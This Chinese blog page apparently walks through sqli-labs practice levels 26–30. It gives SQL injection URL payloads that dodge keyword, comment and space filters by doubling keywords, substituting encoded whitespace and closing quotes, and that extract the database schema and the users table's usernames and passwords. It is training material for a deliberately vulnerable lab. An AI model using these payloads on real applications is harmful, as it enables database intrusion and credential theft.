当前位置：首页 > news >正文

sqli-labs靶场通关攻略(26-30关）

news 2025/7/18 10:22:24

第26关（过滤# -- 空格 and or 等等）

查数据库

这关可以看到，他过滤了我们很多字符

那么我们开始尝试绕过过滤

空格使用括号绕过 and和or使用双写绕过

?id=1'aandnd(updatexml(1,concat(0x7e,(select(database())),0x7e),1))aandnd'1=1

查表

?id=1'aandnd(updatexml(1,concat(0x7e,(select(group_concat(table_name))from(infoorrmation_schema.tables)where(table_schema='security'))),1))aandnd'1=1

查列

?id=1'aandnd(updatexml(1,concat(0x7e,(select(group_concat(column_name))from(infoorrmation_schema.columns)where(table_schema='security'aandnd(table_name='users')))),1))aandnd'1=1

查数据

?id=1'aandnd(updatexml(1,concat(0x7e,(select(group_concat(passwoorrd,username))from(users))),1))aandnd'1=1

第27关（过滤 union、select、注释、空格）

查数据库

?id=1'and(updatexml(1,concat(0x7e,database(),0x7e),1))and'1=1

查表

?id=1'and(updatexml(1,concat(0x7e,(selselecselecttect(group_concat(table_name))from(information_schema.tables)where(table_schema='security'))),1))and'1=1

查列

?id=1'and(updatexml(1,concat(0x7e,(selselecselecttect(group_concat(column_name))from(information_schema.columns)where(table_schema='security'and(table_name='users')))),1))and'1=1

查数据

?id=1'and(updatexml(1,concat(0x7e,(selselecselecttect(group_concat(password,username))from(users))),1))and'1=1

第28关（双写+%0a+大小写+('1')=('1绕过）

查数据

?id=0')%09ununion%09selection%09select%091,database(),3%09and%09('1'='1

查表

?id=0')uniunion%0Aselecton%0Aselect%0A1,2,group_concat(table_name)from%0Ainformation_schema.tables%0Awhere%0Atable_schema='security'and('1=1

查列

?id=0')uniunion%0Aselecton%0Aselect%0A1,2,group_concat(column_name)from%0Ainformation_schema.columns%0Awhere%0Atable_schema='security'%0Aand%0Atable_name='users'%0Aand('1=1

第29关（ ' 闭合）

查库

?id=' union select 1,2,database() --+

查表

?id=' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()--+

查列

?id=' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users'--+

查数据

?id=' union select 1,2,group_concat(username,0x7e,password) from users--+

第30关（ " 闭合）

查库

?id=" union select 1,2,database() --+

查表

?id=" union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()--+

查列

?id=" union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users'--+

查数据

?id=" union select 1,2,group_concat(username,0x7e,password) from users--+

查看全文

http://www.mrgr.cn/news/14604.html

C语言中的int argc, char *argv[]是什么？

Git中pull和fetch的区别

从 MLOps 到 LMOps 的关键技术嬗变

[线程]等待一个线程, 获取当前线程引用,休眠当前线程, 线程的六种状态

（十九）Flink CDC

麒麟信安系统下使用coredump调试应用程序

【React】为什么Hooks不能出现在判断中

ArcGIS栅格裁剪与合并，制作等高线

基于计算机视觉的图书推荐应用【AI编程实录】

沾包问题，wireshark和netstat的使用

程序员的自我修炼：如何拒绝快餐式学习，深耕技能20240829

22AP10 SS524 平替海思HI3521DV200 可提供开发资料

npm pack使用

NLP发展脉络--＞特征优化阶段

什么是枚举？实现原理？

05_react应用（基于react脚手架）

人工智能算力FP32、FP16、TF32、BF16、混合精度解读

consul 运维中遇到的问题

如何开Stand Up Meeting

SEO之网站结构优化（十三-网站地图）

第26关 （过滤# -- 空格 and or 等等）

查数据库

查表

查列

查数据

第27关（过滤 union、select、注释、空格 ）

查数据库

查表

查列

查数据

第28关（双写+%0a+大小写+('1')=('1绕过）

查数据

查表

查列

第29关（ ' 闭合）

查库

查表

查列

查数据

第30关（ " 闭合）

查库

查表

查列

查数据

相关文章：

第26关（过滤# -- 空格 and or 等等）

第27关（过滤 union、select、注释、空格）